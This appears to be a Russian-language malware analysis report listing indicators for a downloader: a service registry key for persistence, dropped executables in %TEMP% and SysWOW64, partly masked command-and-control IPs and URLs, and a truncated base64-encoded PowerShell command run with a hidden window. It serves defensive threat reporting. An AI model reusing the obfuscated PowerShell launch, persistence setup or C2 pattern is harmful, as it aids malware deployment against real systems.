Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\rdpencom] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\rdpencom] 'ImagePath' = '"%WINDIR%\SysWOW64\perfos\rdpencom.exe"'
- 'rdpencom' "%WINDIR%\SysWOW64\perfos\rdpencom.exe"
- 'rdpencom' %WINDIR%\SysWOW64\perfos\rdpencom.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGIAZABiAGQAdQA0AD0AKAAnAFYAcgB6ACcAKwAnAHMAdQBuAGcAJwApADsAJgAoACcAbgBlACcAKwAnAHcAJwArACcALQBpAHQAZQBtACcAKQAgACQARQBOAHYAOgB0AGUATQBwAFwAbwBmAGYAaQBjAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- %TEMP%\office2019\vqio430.exe
- %WINDIR%\syswow64\perfos\rdpencom.exe
- %TEMP%\office2019\vqio430.exe в %WINDIR%\syswow64\perfos\rdpencom.exe
- '13#.#19.36.33':80
- '11#.#02.234.183':8080
- http://sa###ssion.org/sai/fU/
- http://11#.###.234.183:8080/9hnRdGG0e9qiP/NILY8VxqYrQ3W/i0x2p9CkVnghPKNmn/6YTtxxZUgY5XcWm/ via 11#.#02.234.183
- DNS ASK sa###ssion.org
- '%TEMP%\office2019\vqio430.exe'
- '%WINDIR%\syswow64\perfos\rdpencom.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGIAZABiAGQAdQA0AD0AKAAnAFYAcgB6ACcAKwAnAHMAdQBuAGcAJwApADsAJgAoACcAbgBlACcAKwAnAHcAJwArACcALQBpAHQAZQBtACcAKQAgACQARQBOAHYAOgB0AGUATQBwAFwAbwBmAGYAaQBjAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (со скрытым окном)